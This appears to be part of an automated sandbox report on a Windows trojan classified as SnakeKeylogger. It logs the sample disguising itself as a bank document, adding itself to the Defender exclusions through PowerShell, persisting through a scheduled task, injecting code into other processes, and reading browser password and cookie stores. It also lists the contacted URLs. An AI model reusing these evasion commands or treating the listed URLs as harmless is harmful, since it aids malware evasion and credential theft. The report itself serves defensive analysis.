                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h]12_2_019329A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h]12_2_019329A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h]12_2_019329A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h]12_2_019329A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h]12_2_019329A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019329A0 mov eax, dword ptr fs:[00000030h]12_2_019329A0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019209AD mov eax, dword ptr fs:[00000030h]12_2_019209AD
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_019209AD mov eax, dword ptr fs:[00000030h]12_2_019209AD
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192A9D0 mov eax, dword ptr fs:[00000030h]12_2_0192A9D0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192A9D0 mov eax, dword ptr fs:[00000030h]12_2_0192A9D0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192A9D0 mov eax, dword ptr fs:[00000030h]12_2_0192A9D0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192A9D0 mov eax, dword ptr fs:[00000030h]12_2_0192A9D0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeCode function: 12_2_0192A9D0 mov eax, dword ptr fs:[00000030h]12_2_0192A9D0
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe; Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe; Memory written: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe; Memory written: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe base: 400000 value starts with: 4D5A
                Source: C:\Windows\SysWOW64\sdiagnhost.exe; Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF613480000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe; Section loaded: NULL target: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe; Section loaded: NULL target: C:\Windows\SysWOW64\sdiagnhost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe; Section loaded: NULL target: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\sdiagnhost.exe; Section loaded: NULL target: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe protection: read write
                Source: C:\Windows\SysWOW64\sdiagnhost.exe; Section loaded: NULL target: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\sdiagnhost.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\sdiagnhost.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe; Section loaded: NULL target: C:\Windows\System32\conhost.exe protection: execute and read and write
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe; Section loaded: NULL target: C:\Windows\SysWOW64\sdiagnhost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\sdiagnhost.exe; Thread APC queued: target process: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe
                Source: C:\Windows\SysWOW64\sdiagnhost.exe; Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF613480000
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe; Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpB1A6.tmp
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe; Process created: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe; Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fcLfLlfpmjf" /XML "C:\Users\user\AppData\Local\Temp\tmpC983.tmp
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe; Process created: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe
                Source: C:\Program Files (x86)\HITCmsolmmQgoXoEXeUlcJSOtoDkWjBbuzmRRaLEYkE\EnKifmZDGZ.exe; Process created: C:\Windows\SysWOW64\sdiagnhost.exe C:\Windows\SysWOW64\sdiagnhost.exe
                Source: C:\Windows\SysWOW64\sdiagnhost.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
                Source: EnKifmZDGZ.exe, 00000011.00000000.1324524032.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733617235.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383394960.0000000001540000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                Source: EnKifmZDGZ.exe, 00000011.00000000.1324524032.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733617235.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383394960.0000000001540000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                Source: EnKifmZDGZ.exe, 00000011.00000000.1324524032.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733617235.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383394960.0000000001540000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: EProgram Manager
                Source: EnKifmZDGZ.exe, 00000011.00000000.1324524032.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000011.00000002.3733617235.0000000001580000.00000002.00000001.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000016.00000000.1383394960.0000000001540000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeQueries volume information: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe; Queries volume information: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\BANK DETAILS CORRECTIONS.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: C:\Windows\SysWOW64\sdiagnhost.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\sdiagnhost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\sdiagnhost.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\sdiagnhost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\sdiagnhost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\sdiagnhost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\sdiagnhost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\sdiagnhost.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\sdiagnhost.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality


                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 11 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 4 Obfuscated Files or Information | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 22 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Timestomp | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement

                [Behavior graph. Behavior Graph ID: 1411001; Sample: BANK DETAILS CORRECTIONS.exe; Startdate: 18/03/2024; Architecture: WINDOWS; Score: 100]

                Source | Detection | Scanner | Label | Link
                BANK DETAILS CORRECTIONS.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.SnakeKeylogger |
                BANK DETAILS CORRECTIONS.exe | 100% | Joe Sandbox ML | |

                Source | Detection | Scanner | Label | Link
                C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe | 100% | Joe Sandbox ML | |
                C:\Users\user\AppData\Roaming\fcLfLlfpmjf.exe | 71% | ReversingLabs | ByteCode-MSIL.Trojan.SnakeKeylogger |

                No Antivirus matches
                No Antivirus matches

                Source | Detection | Scanner | Label | Link
                http://www.supportstuiwords.com/e6xn/0%Avira URL Cloudsafe
                https://ua01qg.jsj91.top/b8pu1ee/0%Avira URL Cloudsafe
                http://lxoo4j.laoli666.top/2e0w/xted.html0%Avira URL Cloudsafe
                http://www.oc7o0.top/2r7b/mulenc.doc0%Avira URL Cloudsafe
                https://8j3my.stgu5.top/322/0%Avira URL Cloudsafe
                http://www.nikazo.xyz/e6xn/100%Avira URL Cloudphishing
                http://www.605alibahis.com/e6xn/?bvOt=agiyDRT46qDSSmihlQ4LWL8xIgO+qfSg1vPRp09QaQzBVRWpSaW3tusYt1FhFwISNvV57xmnsnPpxHCL/G4hmICdRu2qyIf5a9CtW3wt0Qkcp+tj5w==&CVZ=R6q4lTVpfZfT_D0%Avira URL Cloudsafe
                https://hzw.avt.temporary.site/wp-content/uploads/2024/01/cropped-sys-computer-logo-1-2-32x32.jpg0%Avira URL Cloudsafe
                https://xajg3.mmdb8.top/ji0/b0kf5r.xls0%Avira URL Cloudsafe
                http://is4ml0.2xexb.top/z07/0%Avira URL Cloudsafe
                http://www.oc7o0.top/e6xn/?bvOt=2Kfb+Brrh9GrmqPqLtRK/jRr6sBFjt1I8ubTlYZTytp88LF+iTgF/zqvnUYpIzG87louehFzf7+JPcLVzBlhDb38gBs1IrPZ/tUzM/hN1wjivuIhpg==&CVZ=R6q4lTVpfZfT_D0%Avira URL Cloudsafe
                http://www.appmystartup.com/e6xn/?bvOt=9Ok63Zp3UlyeFJncTpLan6F7UfPHzm35fZEpdutLQ03GKmXAn6TmeK19kU+o3seWSyf9rIWEGfMs+8v+auRJ5uWoro43dFLf6YZQGlVbKlE3Xt0YSA==&CVZ=R6q4lTVpfZfT_D0%Avira URL Cloudsafe
                http://dof.nqku1.top/7f7/67mxw.xls0%Avira URL Cloudsafe
                https://d17ced.6imvv.top/nutmwu9/mie.docx0%Avira URL Cloudsafe
                http://www.oc7o0.top/7fdwd/0%Avira URL Cloudsafe
                http://www.roblesprats.com0%Avira URL Cloudsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://zspo.sf3l2.top/0ie1ye/vlc52d.htmsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBANK DETAILS CORRECTIONS.exe, 00000000.00000002.1295194192.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 0000000D.00000002.1361939859.00000000028EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.oc7o0.top/e8miho/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://osmfn1.djzcz.top/ipb/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.oc7o0.top/ik0/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://ijg.oc7o0.top/7a85xk/ua98sk.htmsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.oc7o0.top/4d7o8gx/wpst3.pptsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://1mt8.ss1yp.top/g9sb/sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://g77.8v089.top/damu1/pl7.xlsxsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://4mt4jb.ko6sc.top/6d92ec/oicfh3p.docsdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
